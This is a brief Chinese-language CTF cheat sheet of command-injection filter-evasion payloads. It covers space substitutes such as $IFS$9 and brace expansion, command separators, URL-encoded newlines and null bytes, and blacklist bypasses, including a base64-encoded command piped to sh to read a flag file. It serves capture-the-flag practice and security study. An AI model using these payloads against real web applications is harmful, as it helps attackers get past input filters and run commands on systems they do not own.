浅谈CTF中命令执行与绕过的小技巧
一、空格绕过
1.cat<filename
shell
2.cat<>filename
shell
3.{cat,flag.txt}
shell
4.%09 符号
php
5.cat$IFS$9filename
cat${IFS}filename
shell
6.a=$'\x20flag.txt'&&cat$a
shell 注:\x20为空格符
二、命令分隔符号
1.ls /;cat filename
shell
2.ls /&cat filename
shell
3.ls /|cat filename
shell
4.%0a
php
5.%0d
php
三、命令终止符
1.%00 %20
php
四、黑名单绕过
1.a=l;b=s;$a$b
shell
2.echo R0g=|base64 -d
shell
看情况联合使用
`echo$IFS$echo$IFS$9Y2F0JElGUyQ5ZmxhZy5waHA=|base64$IFS$9-d|sh|$IFS$9base64$IFS$9-d`
echo$IFS$9Y2F0JElGUyQ5ZmxhZy5waHA=|base64$IFS$9-d|sh
`head$IFS$9/fla?$IFS$9>1.txt`